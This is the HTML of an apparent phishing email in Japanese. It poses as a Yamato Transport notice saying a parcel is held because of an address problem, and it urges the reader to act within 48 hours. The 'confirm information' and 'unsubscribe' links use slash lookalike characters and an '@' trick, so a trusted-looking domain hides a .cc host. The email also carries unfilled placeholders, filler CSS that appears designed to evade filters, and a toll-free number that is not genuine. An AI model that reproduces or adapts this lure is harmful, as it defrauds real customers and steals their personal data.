【重要】配送情報の更新確認のお願い
<!doctype HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html lang=ja><head><title>【重要】配送情報の更新確認のお願い</title>
<meta charset=UTF-8>
<meta name=viewport content="width=device-width, initial-scale=1.0">
<style>
body {
font-family: 'Meiryo', 'Hiragino Kaku Gothic Pro', sans-serif;
line-height: 1.6;
color: #333;
max-width: 600px;
margin: 0 auto;
padding: 20px;
background-color: #f5f5f5;
}
.container {
background-color: white;
padding: 30px;
border-radius: 5px;
box-shadow: 0 2px 5px rgba(0,0,0,0.1);
}
.header {
color: #333;
font-size: 18px;
font-weight: bold;
margin-bottom: 20px;
border-bottom: 2px solid #666;
padding-bottom: 5px;
}
.alert-box {
background-color: #f0f0f0;
padding: 15px;
border-left: 4px solid #999;
margin: 15px 0;
}
.procedure-box {
background-color: #f8f8f8;
padding: 15px;
border-radius: 5px;
margin: 15px 0;
border: 1px solid #ddd;
}
.button {
display: inline-block;
background-color: #555;
color: white;
padding: 12px 24px;
text-decoration: none;
border-radius: 4px;
margin: 15px 0;
font-weight: bold;
text-align: center;
}
.note {
font-size: 13px;
color: #666;
margin: 15px 0;
}
.warning {
color: #333;
font-weight: bold;
}
.footer {
font-size: 12px;
color: #777;
margin-top: 30px;
border-top: 1px solid #eee;
padding-top: 15px;
}
ul, ol {
padding-left: 20px;
}
li {
margin-bottom: 5px;
}
a {
color: #555;
text-decoration: underline;
}
</style>
<meta name=GENERATOR content="MSHTML 11.00.10570.1001"><style>
.mfsthkoyqj-jzp .Pazdf-Gxjzylix-Czfa .rjqaavas-bxrtviuhml-ylpnhmtha #Txjp-Erlwqc-Nreltexnct {
text-decoration:none black solid;
animation-delay:0;
}
</style></head>
<body>
<div class=container>
<div class=header>【重要】配送情報の更新確認のお願い</div>
<p>平素よりクロネコヤマトの宅配便をご利用いただき、誠にありがとうございます。</p>
<div class=alert-box>
<p class=warning>重要なお知らせ</p>
<p>お客様がご利用の荷物(お問い合わせ番号:[伝票番号])につきまして、<br>宛先情報の不備により配達が保留されております。</p></div>
<p><strong>■現在の状況</strong></p>
<ul>
<li>配達保留中(宛先情報確認待ち)
<li>最終更新期限:[日付]17:00まで</li></ul>
<p class=procedure-box><strong>■必要な対応</strong></p>
<div class=procedure-box>
<ol>
<li>クロネコヤマト公式サイトにアクセス
<li>「お問い合わせ番号」で荷物を検索
<li>「宛先情報の確認・修正」を選択
<li>正しい情報を入力し送信</li></ol></div>
<p align=center><a class=button href="https://mb.insweb.co.jp∕wMqfQZYor∕YHprCQyte∕ghQrzhuiVE@9162714969.02878.cc/zqrpujt.co.jp">情報確認ページへ</a></p>
<p
class=note><strong>■対応期限</strong><br>本メール到着後48時間以内<br>(未対応の場合、荷物が返送される場合があります)</p>
<p
class=note><strong>■お問い合わせ先</strong><br>ヤマト運輸カスタマーセンター<br>03-7507-5179(通話無料)<br>受付時間:8:00~21:00(年中無休)</p>
<p class=warning>■重要注意事項</p>
<p
class=note>・既に情報更新済みの場合は無視してください<br>・本メールは送信専用です(返信不可)<br>・心当たりのない場合は破棄願います</p>
<div class=footer>
<p>ご不明な点がございましたら、お気軽にお問い合わせください。</p>
<p>引き続きクロネコヤマトをご愛顧賜りますようお願い申し上げます。</p>
<p><a href="https://mb.insweb.co.jp∕PMrZaTPLf∕AUfidmLiV∕NHWLo@5018670910.02878..cc/exyjoyr.co.jp">配信停止</a></p></div></div></body></html>